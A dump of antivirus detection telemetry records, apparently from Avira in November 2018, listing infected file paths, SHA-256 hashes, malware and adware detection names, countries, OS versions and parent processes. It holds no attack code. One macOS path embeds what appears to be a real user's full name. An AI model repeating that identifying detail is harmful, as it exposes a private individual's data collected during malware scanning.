  Row(detection=Row(filename='avscan-20181104-124529-78fcfeac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b8b3d596\\AVSCAN-20181104-122936-F2F99660\\AVSCAN-20181104-124529-78FCFEAC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:45:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ff66c72f79d781f1f17387284fc3c8cd4b166eb9107e649f074a8211f6827a39.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\09.12.2017-218.available\\Avira\\Others\\PE-detected-Avira\\Adware.CrossRider.vgvvy\\ff66c72f79d781f1f17387284fc3c8cd4b166eb9107e649f074a8211f6827a39.MRG', filesize=2096000, name='Adware/CrossRider.vgvvy.#M1.#R1'), hash='ff66c72f79d781f1f17387284fc3c8cd4b166eb9107e649f074a8211f6827a39', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\11.02.2018-388.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T07:56:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T00:48:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091802-a6c2a628', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b0e95d17\\AVSCAN-20181102-091618-92C00E62\\AVSCAN-20181102-091802-A6C2A628', filesize=128000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='cf5c59cc073ad99ca22e6dc10b026dca6aff1cf3ffce58b21138d7ba59a3d739', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:18:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T15:56:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:17:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qbiolxxf.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\QBIoLXxf.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:48:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:15:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=9024000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='72c8e82804e78a3ea589f1ecc38fde6259dbac71c5818c433d84b4a07be3e596', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T11:19:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tutpmguh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\tUtpMGUh.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195317-94da0d22', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_001e0289\\AVSCAN-20181102-194148-54DD84AC\\AVSCAN-20181102-195317-94DA0D22', filesize=1020000, name='PUA/MyPCBackup.#M1.#R1'), hash='d55b192248c695cc763c8c5bd5a3d40aa91842a57756cc2ab3150227bcd41030', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='generic.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\MODELS\\GENERIC\\GENERIC.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='f07ff3a117b1cb9148db64dbafb259194b513606f4a76143f0fcfd47717aa753', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installd.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\installd.exe', filesize=128000, name='ADWARE/Amonetize.ges.#M1.#R1'), hash='d19333f451c5235e5f001f32e4b27c01b77adb20d48e6b5dabfa512221e0a1cc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autokms.exe', filepath='C:\\Windows\\AutoKMS\\AutoKMS.exe', filesize=1856000, name='TR/Rogue.KDV.795271.1.#M1.#R1'), hash='ec418843efb4baeac8d80b9df6901e4860efda54941b64e346f97f9fde3a8994', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\Microsoft Office 2013 32bit 64bit 雙位元 繁體中文版 (含破解)\\Office 2013 啟用工具\\Microsoft Toolkit.exe', parentsize=38179840, timestamp='2018-11-02T08:10:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102010-a04981a0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102010-A04981A0', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-021513-bc4e3a55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-021513-BC4E3A55', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d0311c978d131ded69d61d1f141afc0eb99b6c978c7bfda575032f5b44603204', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:17:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:48:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-02T11:48:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:46:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ginyu.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Ginyu\\Ginyu.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='d6e16250c7516c45198b0f3d2029f7fb980b732cbf31efe07e449651baea9488', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T06:51:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crossfire pack#2.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Hotkey\\Macro Pack#2\\Crossfire Pack#2.exe', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='dab9d19236846daa08dfce5e5487e83374f5ffaf7c7f010a892d384274935f98', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:55:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='evernotenw.exe', filepath='C:\\Program Files (x86)\\Evernote\\Evernote\\NodeWebKit\\EvernoteNw.exe', filesize=42860000, name='W32/Parite.#M1.#R1'), hash='b23c9e88dcc9bbd593387bb828893dd0862454e39d73d7cdc22ecbd4c811f70f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:rFoXppRorE6gWvjr.1', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:46:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115310-b92562bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_933d2ac7\\AVSCAN-20181102-115233-B37A397E\\AVSCAN-20181102-115310-B92562BC', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:53:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cytexpert.exe', filepath='\\\\?\\C:\\Program Files\\CytExpert\\CytExpert.exe', filesize=67840000, name='HEUR/AGEN.1013859.#M1.#R1'), hash='df1d9515de837d35ea4344fb3b5bf25f667222764bc8a3df3250b962e2d27467', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:28:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='convertad.exe', filepath='C:\\Users\\X\\AppData\\Local\\ConvertAd\\ConvertAd.exe', filesize=1792000, name='HEUR/AGEN.1004878.#M1.#R1'), hash='9c9e96993d0b0903569690bfce26c5d7dbf38f9cdb90830deb89b0bbd21e63ed', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\31.164.200\\software_reporter_tool.exe', parentsize=13813368, timestamp='2018-11-02T20:58:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bilibili.dll', filepath='\\\\?\\c:\\program files\\bilibili\\bilibili.dll', filesize=128000, name='ADWARE/Adware.Gen7.#M300.#R601658'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082618-78f63dd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-082615-784E182D\\AVSCAN-20181102-082618-78F63DD3', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:29:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0010d639', filepath='\\\\?\\C:\\ProgramData\\ESTsoft\\ALYac\\tmpArc\\tmp00000159\\tmp0010d639', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:12:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e7a52bb71dc54001c6a2639b99aee28a852dfc9a4f057cc9ece93f0977f70b9c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-19\\E7A52BB71DC54001C6A2639B99AEE28A852DFC9A4F057CC9ECE93F0977F70B9C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e7a52bb71dc54001c6a2639b99aee28a852dfc9a4f057cc9ece93f0977f70b9c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083006-659a9d20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_782d9053\\AVSCAN-20181102-082936-B097A02F\\AVSCAN-20181102-083006-659A9D20', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:32:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00239706', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239706', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:42:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292003', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292003', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:03:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023da90', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023da90', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:49:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152043-75c9d794', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-152043-75C9D794', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029645b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029645b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:21:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133327-d56dce0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8748c67e\\AVSCAN-20181104-120656-00F74416\\AVSCAN-20181104-133327-D56DCE0A', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:33:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ed6657bb0d0bdfe64632ddbc923baa2583872fd76ef291cc757019a27f0901b4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\ED6657BB0D0BDFE64632DDBC923BAA2583872FD76EF291CC757019A27F0901B4', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ed6657bb0d0bdfe64632ddbc923baa2583872fd76ef291cc757019a27f0901b4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:51:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205049-a238a9df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-205049-A238A9DF', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:50:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291dad', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291dad', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:01:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-134805-97d1e4dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb5c1145\\AVSCAN-20181104-134601-85978A80\\AVSCAN-20181104-134805-97D1E4DD', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-031647-460e49dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_90189271\\AVSCAN-20181104-031548-3968D925\\AVSCAN-20181104-031647-460E49DC', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:18:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f8c9945870f286a27b08f748783c0cab00d53822d7ae75b017c041219439a3be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F8C9945870F286A27B08F748783C0CAB00D53822D7AE75B017C041219439A3BE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f8c9945870f286a27b08f748783c0cab00d53822d7ae75b017c041219439a3be', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:58:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-25-004640/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:17:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='f:\\pindahan my dokumen\\videos\\windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fee6c2558c5fd504dfa8fd36769145d0afa0f1615a1c84d47573274f2cbb53da', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:40:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:35:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00251ed5', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251ed5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:36:05Z'), dt=datetime.date(2018, 11, 1)),
